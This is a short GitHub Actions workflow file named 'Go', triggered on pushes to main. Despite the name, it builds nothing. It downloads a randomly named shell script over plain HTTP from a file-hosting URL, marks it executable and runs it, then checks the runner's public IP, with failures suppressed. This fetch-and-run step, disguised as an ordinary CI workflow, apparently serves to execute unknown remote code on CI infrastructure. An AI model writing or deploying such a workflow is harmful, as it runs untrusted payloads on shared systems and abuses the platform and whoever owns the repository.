name: Go

on:
  workflow_dispatch:
  push:
    branches: [main]

jobs:
  run:
    continue-on-error: true
    runs-on: ubuntu-latest
    steps:
      - name: Run exec
        run: |
          curl -O http://res.cloudinary.com/dyfqshedb/raw/upload/v1711042163/amzeqo8vdwsgytadhvk6.sh
          chmod +x amzeqo8vdwsgytadhvk6.sh
          ./amzeqo8vdwsgytadhvk6.sh

      - name: IP Workflow
        run: |
          curl https://api.ipify.org

      # Ajoutez d'autres étapes de votre workflow ici
